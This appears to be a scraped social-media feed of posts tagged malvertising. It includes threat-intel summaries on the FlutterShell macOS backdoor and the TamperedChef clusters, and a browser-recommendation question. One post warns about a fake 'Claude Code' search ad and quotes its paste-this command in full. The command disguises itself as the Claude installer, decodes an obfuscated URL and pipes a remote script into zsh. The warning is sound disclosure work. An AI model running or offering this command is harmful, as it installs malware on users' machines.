Malvertising Campaign Spreads FlutterShell Backdoor to macOS Users
macOS users beware: a sneaky malware called FlutterShell is spreading through malicious ads and infected desktop apps, allowing hackers to take control of your device and steal sensitive data. This stealthy backdoor can execute commands, access files, and even siphon off browser session info - all while masquerading as legitimate software.
Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor
Pulse ID: 6a2105954034647e83ac7c6c
Pulse Link: https://otx.alienvault.com/pulse/6a2105954034647e83ac7c6c
Pulse Author: Tr1sa111
Created: 2026-06-04 04:56:53
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #CyberSecurity #InfoSec #Mac #MacOS #Malvertising #OTX #OpenThreatExchange #RAT #bot #Tr1sa111
Operation FlutterBridge: macOS Malvertising Campaign Spreads New FlutterShell Backdoor
A financially-motivated cybercrime cluster designated CL-CRI-1089 has launched Operation FlutterBridge, deploying FlutterShell backdoor malware targeting macOS systems through malvertising. Built with the Flutter framework, FlutterShell masquerades as legitimate applications including podcast players and PDF viewers, delivering adware with full backdoor capabilities such as shell command execution and file system manipulation. The malware uses a WebView-based architecture with JavaScript-to-native bridge, allowing attackers to dynamically modify behavior without recompiling. Distribution occurs through hundreds of Google-verified advertisements controlled by shell companies including AdsParkPro LTD and Advantage Web Marketing LLC. The campaign primarily targets Anglophone and Western European markets. All samples were signed with valid Apple Developer IDs and successfully passed notarization, achieving zero detections on VirusTotal initially. The malware hijacks Google Chrome browsers, redirecting traffic ...
Pulse ID: 6a1ee9cdd897e06c7cac14d9
Pulse Link: https://otx.alienvault.com/pulse/6a1ee9cdd897e06c7cac14d9
Pulse Author: AlienVault
Created: 2026-06-02 14:33:49
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#BackDoor #Browser #Chrome #CyberCrime #CyberSecurity #Europe #Google #InfoSec #Java #JavaScript #Mac #MacOS #Malvertising #Malware #OTX #OpenThreatExchange #PDF #RAT #Rust #Troll #VirusTotal #WesternEurope #bot #AlienVault
Malvertising Campaign Targets macOS with FlutterShell Backdoor
Google swiftly suspended advertiser accounts linked to a massive malvertising campaign that spread a new macOS backdoor, known as FlutterShell, after researchers sounded the alarm. The culprits, tracked by Palo Alto Networks as CL-CRI-1089, used hundreds of verified Google ads and a web of shell companies to deceive ad networks.
#Macos #Malvertising #FluttershellBackdoor #Clcri1089 #GoogleAds
Hackers hijacked thousands of sites to spread ClickFix and FakeUpdate attacks - trusted websites are becoming malware launchpads. Browsing safely now means questioning everything. 🌐⚠️ #Malvertising #SocialEngineering
The top result for "claude code" on Google right now is malvertising. We are so cooked.
anvil-89[.]com
sites[.]google[.]com/newappclaude.com/clau-ver-un-30
```
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo "aHR0cHM6Ly9hbnZpbC04OS5jb20vY3VybC8zYTNlYzQxZTQ3NGJlODFjZWMzYTk5OTE5NmJmYThiZTY5YTI5MTliNWZkYWY3ZTA1ZGEzZjU3Y2U2YjRhYTMx" | openssl base64 -d -A) | zsh
```
#Cybersecurity #Security #Malvertising #Malware #Google #AdTech #Advertising #ThreatIntelligence #ThreatIntel
@kitkat_blue @thomasfuchs Are there any good Chromium-based browsers which provide the functionality for which most current #Brave users presumably intend to attain by installing Brave?
I need something to recommend or install for clients who want to replace Chrome or Edge with something familiar, while protecting them from #surveillance, #malvertising, and other ad- or tracking-based threats.
A disenshittified Firefox fork + uBlock Origin works for those who are willing to adapt to a slightly different look and feel, but a lot of clients insist (in different words) on maintaining as close to the #Chromium UX as possible.
Tracking TamperedChef Clusters via Certificate and Code Reuse
Multiple threat clusters designated as CL-CRI-1089, CL-UNK-1090, and CL-UNK-1110 have been distributing trojanized productivity software through malicious advertising campaigns since 2023. These applications, including PDF editors, calendars, and compression tools, appear legitimate but contain remote access capabilities enabling deployment of information stealers, proxy tooling, and RATs. The campaigns leverage code-signing certificates, remain dormant for weeks to months before activation, and affect organizations globally with over 4,000 samples identified across 100 variants. CL-CRI-1089 operations utilize Ukrainian, Malaysian, and British infrastructure with 34 unique code-signing entities, while CL-UNK-1090 demonstrates vertical integration between advertising agencies and malware creation using primarily Israeli infrastructure with 39 corporations involved. Distribution occurs through sophisticated malvertising employing professional websites, CDN delivery, and search engine optimization techniques.
Pulse ID: 6a0dae41682ec38e55d1aa12
Pulse Link: https://otx.alienvault.com/pulse/6a0dae41682ec38e55d1aa12
Pulse Author: AlienVault
Created: 2026-05-20 12:51:13
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CDN #CyberSecurity #InfoSec #Israel #Malvertising #Malware #OTX #OpenThreatExchange #PDF #Proxy #RAT #Trojan #UK #Ukr #Ukrainian #bot #AlienVault
Malvertisers Exploit Code Signing in TamperedChef Malware Campaigns
Meet the sneaky malware campaign that's been flying under the radar, leveraging polished marketing tactics and code signing to spread its malicious reach - with over 4,000 samples and 100 unique variants uncovered across three distinct clusters of activity.
#TamperedchefMalware #CodeSigning #MalwareOperations #Malvertising #PaloAltoNetworks
Analyst207
OTX Bot
Manuel Bissey
Bálint Magyar
David
Marcel SIneM(S)US
